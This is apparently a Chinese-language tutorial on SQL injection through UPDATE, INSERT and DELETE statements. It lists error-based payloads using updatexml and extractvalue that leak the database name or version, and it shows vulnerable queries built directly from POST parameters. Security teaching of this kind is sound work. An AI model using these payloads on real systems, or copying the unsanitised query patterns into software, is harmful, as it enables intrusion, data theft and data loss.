目录
一、简介:
示例:
示例:
示例:
一、简介:
与数据库交互的请求都有可能造成SQL注入。常见的注入都是select的查询注入比较多,但是SQL注入在参数没有检查和过滤的时候就会把恶意的数据插入数据库,如:插入数据,更改数据,删除数据等
但是相对于插入,更改,删除权限,普通用户查询权限一定是有的
二、UPDATE注入
2.1、语法:
更新某一列
UPDATE table SET column=new_value WHERE column= value
更新若干列
UPDATE table SET column1=new_value1, column2=new_value2 WHEREcolumn= value
2.2、利用:
payload:
aaaa' or updatexml(1, concat(0x7e, database()),0) or '(字符型)
' or extractvalue(1,concat(0x5e24,(database()))) or '(数字型)
示例:
update table set column='' or updatexml(1,concat(0x7e,(database())),0) or '',password='$_POST['password']' where id=$_POST['id']
三、insert注入
3.1、语法:
插入数据
insert into table(column1, column2, column3) value (value 1, value 2, value 3)
3.2、利用:
payload:
' or updatexml(1,concat(0x7e,(database())),0) or '(字符型)
' or extractvalue(1,concat(0x5e24,(database()))) or '(数字型)
示例:
insert into user(username,password) values('' or updatexml(1,concat(0x7e,(database())),0) or '','$_POST['password']')
四、delete注入
4.1、语法:
删除表中指定数据
delete from table where id=$id
4.2、利用:
payload:
or or updatexml(1,concat(0x7e,(database())),0) or ' '
or extractvalue(1,concat(0x5e24,(database()))) or ' '
'or(有效载荷)or'
'and(有效载荷)and'
'or(有效载荷)and''or(有效载荷)and'='
'*(有效载荷)*'
'or(有效载荷)and'
" - (有效载荷) - "
示例:
delete注入时使用 or 一定要为false,为ture就被执行,没有报错回显了
delete from admin where id =-2 or updatexml(1,concat(0x7e,(version())),0)
